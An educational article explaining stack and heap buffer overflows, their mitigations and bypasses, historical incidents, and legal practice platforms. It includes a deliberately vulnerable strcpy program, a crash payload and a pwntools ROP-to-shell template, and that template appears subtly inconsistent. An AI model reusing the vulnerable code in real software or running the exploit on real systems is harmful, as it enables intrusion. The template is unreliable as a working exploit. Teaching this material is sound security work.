Buffer Overflow Explained — Stack Mechanics, Exploits, and Mitigations

Buffer Overflow (BOF) is the classic-of-classics among memory-safety vulnerabilities: writing past the end of an allocated buffer and corrupting the adjacent memory region. From the 1988 Morris Worm to glibc CVE-2024-2961 in 2024, it has remained an active attack surface. This article covers stack BOF mechanics, an overview of heap BOF, the mitigation/bypass arms race, historical incidents, and legitimate practice grounds — end to end.

Why BOF is still load-bearing #

"Surely in the age of Rust and Go this is an old problem?" is a tempting thought, but published statistics from the Microsoft Security Response Center and Google Project Zero report that "about 70% of our CVEs are still memory safety bugs". The bulk of the code carrying modern infrastructure — Linux kernel, Windows internals, Chrome, Firefox, OpenSSL, FFmpeg — is still written in C/C++.

The reason BOF persists comes back to the foundational design of C/C++.

No bounds checking on array access — neither the compiler nor the runtime stops you from writing buf[1000000]
Standard functions take no "size of the destination" argument — strcpy / gets / sprintf / memcpy all trust the input length and just write
Pointers can point at arbitrary memory — out-of-bounds references and accesses that bypass the allocator are both possible
Memory ownership is not tracked at compile time — use-after-free and double-free cannot be prevented statically

▸ The long migration to memory-safe languages

Rust / Go / Swift / Java / Python / Ruby / C# / JavaScript structurally prevent these classes by having the compiler or runtime check them. Rust merging into the Linux kernel (2022 onward), Microsoft moving from TypeScript to Rust, and Android standardising on Rust for new native code are all consequences of this. Even so, the industry consensus is that a full replacement will take 20+ years.

How a stack-based BOF works #

The classic of classics — stack-based buffer overflow — is dissected by looking at the function-call stack frame. The positional relationship between the local buffer and the saved return address is the ignition point of the attack.

x86_64 Linux stack frame (high → low addresses) #

Region	Role
Caller's arguments / environment	High end (e.g. 0x7fff...ff00)
★ saved RIP (return address)	Points to the next instruction in the caller = the attack target
saved RBP	Base pointer of the previous stack frame
Local variables	Small variables inside the function
char buf[64]	The 64-byte buffer allocated on the stack (low end)

Classic vulnerable stack-BOF code

// vulnerable.c
#include <string.h>
#include <stdio.h>
void vulnerable(char *input) {
    char buf[64];           // 64 bytes on the stack
    strcpy(buf, input);     // ★ no size check → past 64 bytes the saved RIP is overwritten
    printf("%s\n", buf);
}
int main(int argc, char **argv) {
    if (argc > 1) vulnerable(argv[1]);
    return 0;
}

Build with every mitigation off and see the segfault

$ gcc -fno-stack-protector -no-pie -z execstack -O0 vulnerable.c -o vulnerable
# distance to saved RIP = buf + saved RBP = 64 + 8 = 72 bytes
$ ./vulnerable $(python3 -c 'print("A"*72 + "BBBBBBBB")')
Segmentation fault       # RIP = 0x4242424242424242 (= "BBBBBBBB")

What the attacker stuffs into the input #

Shellcode injection — pack shellcode (a few dozen bytes of assembly that spawn /bin/sh) into the buffer, and overwrite the saved RIP with the buffer's own address. Defeated by NX (DEP)
ret2libc — point saved RIP at libc's system() and pass the address of /bin/sh as the argument. Defeated by ASLR
ROP (Return-Oriented Programming) — chain together existing code snippets (gadgets) using ret to build arbitrary behaviour. The mainstream of modern BOF exploits
JOP / SROP / COOP — variants of ROP

▸ The dangerous C standard library — "do not use" for 30 years

gets() — no size argument. Removed in C11 but still found in surviving code
strcpy() / strcat() / sprintf() — no size argument. The strncpy family has its own pitfalls (missing NUL terminator)
scanf("%s", buf) — unsized %s is effectively gets. You need %63s
memcpy(dst, src, attacker_controlled_len) — if len is attacker-controlled, the bug is the same

Heap-based BOF — targeting chunk metadata #

BOF that happens on the heap (regions allocated with malloc() / new) rather than the stack is heap BOF. It doesn't grab PC as directly as stack BOF, but by corrupting the heap allocator's bookkeeping metadata it can be developed into arbitrary memory write (write-what-where).

In glibc's malloc (ptmalloc2), each chunk has a header [size | prev_size | data...], and freed chunks are joined into a doubly-linked list. Overwriting the fd / bk pointers of an adjacent chunk via a heap BOF lets a later unlink() write to an arbitrary address — the classic "unlink attack".

Modern glibc added a lot of consistency checks to unlink(), but House of Force / House of Spirit / fastbin dup / tcache poisoning / large bin attack and other generation-specific techniques keep being published. The tcache family since glibc 2.35 is a particularly active area of new attacks.

Memory-safety vulnerabilities alongside heap BOF #

Use-After-Free (UAF) — use a pointer after free() → the memory has been reused for something else, so writing corrupts that other data
Double Free — free() the same pointer twice → the free list is destroyed
Type Confusion — treat an object as a different type (frequent in C++ vtables)
Out-of-Bounds Read — Heartbleed (CVE-2014-0160) is the canonical example. Not writing, but reading: the contents of adjacent memory leak

▸ All of these share the same root: the language doesn't check pointer validity at compile time

BOF / UAF / double free / type confusion / OOB read are all consequences of the same C/C++ design choice — neither memory ownership nor bounds are tracked by the language.

The mitigation / bypass arms race #

Since BOF can't be eliminated outright, the OS, compiler, and hardware have layered mitigations on top of each other. Every mitigation has a bypass.

Mitigation	Introduced	Goal	Main bypass
Stack Canary (SSP)	1998 (StackGuard) → standardized 2000s	Place a secret value just before saved RIP and verify it before return	Leak the canary via info leak / reach ret through a different path
DEP / NX bit	2003-2005	Mark data regions non-executable → shellcode in buf can't run	ROP (chain existing code snippets) / ret2libc
ASLR	2001 (PaX) → mainline 2005	Randomize load addresses of stack / heap / libc / executable	info leak / partial overwrite / brute force (32-bit) / BROP
PIE	Standard from the 2010s	Randomize the main executable too	info leak the executable base / GOT overwrite
CFI / Intel CET / ARM PAC	2018-2020s	Verify indirect-call targets and ret destinations at runtime	data-only attacks that stay within CFI / COOP
Memory-Safe Languages	Rust 2015 / Go 2009 / Swift 2014	Build bounds checks into the language itself — BOF is impossible in principle	Bugs inside `unsafe` blocks / C reached via FFI

A modern binary (anything distributed by a Linux distro) ships with all five — SSP + DEP + ASLR + PIE + RELRO. You can confirm with checksec.sh or pwntools' checksec — missing even one significantly lowers exploit difficulty.

Check a binary's mitigations at a glance

$ checksec --file=./vulnerable
RELRO         STACK CANARY   NX        PIE     RPATH    RUNPATH    Symbols    FORTIFY
Full RELRO    Canary found   NX enab.  PIE en. No RPATH No RUNPATH No symbols Yes
# From pwntools in Python
$ python3 -c 'from pwn import *; print(checksec("./vulnerable"))'

▸ "All mitigations enabled" does not equal "unexploitable"

Combine one info leak (arbitrary read) with one BOF and a modern exploit can punch through nearly any protection stack. Pwn2Own produces multiple full sandbox escapes per year across Chrome, Safari, iOS, and the Windows kernel. Mitigations raise the wall; they do not make it impassable.

Historical incidents — BOFs that changed the world #

Year	Incident	Mechanism	Impact
1988	Morris Worm	Stack BOF in `fingerd`'s `gets()` + sendmail debug + rsh brute force	Took down ~10% of the Internet. The first Internet worm. Triggered the founding of CERT
1996	Aleph One "Smashing the Stack" (Phrack 49)	First textbook-level explanation of stack BOF and shellcode authoring	The starting point of modern exploitation. Still cited as a classic
2001	Code Red (CVE-2001-0500)	BOF against IIS Index Server	Infected 350,000 Windows servers; designed to DDoS the White House
2003	SQL Slammer (CVE-2002-0649)	A 376-byte UDP BOF packet against MS SQL Server 2000	Spread to 75,000 hosts in 10 minutes; congested global bandwidth; took ATMs offline
2014	Heartbleed (CVE-2014-0160)	Out-of-bounds READ in the OpenSSL TLS heartbeat	17% of HTTPS servers exposed private keys / session data / passwords
2017	WannaCry / EternalBlue (CVE-2017-0144)	Heap overflow when parsing an SMBv1 structure	200,000+ Windows machines hit with ransomware. NHS / railways / car factories halted
2024	glibc CVE-2024-2961	Out-of-bounds write in `iconv`'s ISO-2022-CN-EXT	PoC published showing how PHP filter chains develop it into RCE

▸ Memory-safety vulnerabilities did not vanish in 30 years

This fact is exactly what motivates Microsoft / Google to switch new code to Rust. The Linux kernel accepting Rust (2022), portions of the Windows kernel moving to Rust, and Android standardising on Rust for new native code are all downstream of this realization.

How to learn — legitimate practice platforms #

Trying any of this on someone else's system = unauthorized access (criminal offence). The right entry point is a deliberately-vulnerable practice environment.

Platform	Content	Difficulty
pwn.college	Free Arizona State University course. Curriculum from stack BOF → ROP → kernel exploits	Beginner to advanced
pwnable.kr	The veteran Korean pwn site. Level-graded vulnerable binaries	Beginner to advanced
pwnable.tw	Taiwan's advanced pwn site. Strong heap / kernel exploits	Intermediate to elite
picoCTF	Beginner CTF hosted by Carnegie Mellon. PicoGym is permanently available	Beginner
HackTheBox	General challenges → Pwn category	Beginner to advanced
OverTheWire (Narnia, Behemoth, Vortex)	Classic BOF / format string wargames	Beginner to intermediate
Microcorruption	Matasano's ARM embedded-device BOF wargame	Beginner to intermediate
Exploit-Education (Phoenix, Nebula)	A series that raises protections step by step	Beginner to intermediate

Required tools (all included in Kali Linux) #

The standard set for dynamic analysis, static analysis, and exploit development

# Dynamic analysis / debuggers
$ gdb + pwndbg / GEF / peda    # enhanced GDB (essential for modern pwn)
$ strace -f ./vulnerable        # syscall trace
$ ltrace ./vulnerable           # library-call trace
# Static analysis / binary analysis
$ checksec --file=./bin         # confirm mitigations
$ ROPgadget --binary ./bin      # enumerate ROP gadgets
$ ropper --file ./bin           # same idea, alternative implementation
$ objdump -d ./bin | less     # disassembly
$ radare2 ./bin                  # lightweight reverse engineering
$ ghidra                        # NSA's GUI decompiler
# Exploit development
$ python3 + pwntools            # de facto standard for exploit scripts
$ one_gadget ./libc.so.6        # enumerate one-shot execve('/bin/sh') addresses inside libc

A minimal pwntools exploit template #

info leak → ROP chain → shell

from pwn import *
elf  = ELF("./vulnerable")
libc = ELF("./libc.so.6")
p    = process("./vulnerable")        # local; use remote("host", port) for remote
# 1. info leak to get libc base
p.sendline(b"A" * 64 + p64(elf.plt["puts"]))
leak = u64(p.recvline().strip().ljust(8, b"\x00"))
libc_base = leak - libc.sym["puts"]
# 2. build the ROP chain
rop = ROP(libc)
rop.raw(b"A" * 72)                    # padding to saved RIP
rop.system(next(libc.search(b"/bin/sh\x00")) + libc_base)
p.sendline(rop.chain())
p.interactive()                       # shell

▸ Never run this against anything outside a CTF / practice platform

Trying any of this on a real service is a crime the moment you do it. Even an internal pentest at your employer requires a written Rules of Engagement (RoE). The same legal and ethical framing as in the Kali Linux article applies here.

Summary — an honest take as of 2026 #

BOF is the consequence of a 1970s language design decision: "C/C++ doesn't bounds-check memory." For 30+ years it has been a primary Internet-scale attack surface
Stack BOF (strcpy past the end → overwrite saved RIP → seize control on ret) and heap BOF (corrupt chunk metadata → write-where) share the same root
Reading the history as an arms race — mitigations piling up (SSP / DEP / ASLR / PIE / CFI) versus bypasses evolving (ROP / info leak / heap grooming) — makes modern memory-safety CVE writeups readable with a map
The real answer is rewriting in memory-safe languages. With full replacement still 20+ years away, the practical mix is:
- Verify the mitigation stack is correctly enabled with checksec
- Catch memory-safety bugs early with fuzzing
- Start new projects in Rust / Go
- For existing C/C++, prefer bounds-checked alternatives (strncpy_s / snprintf / Rust wrappers)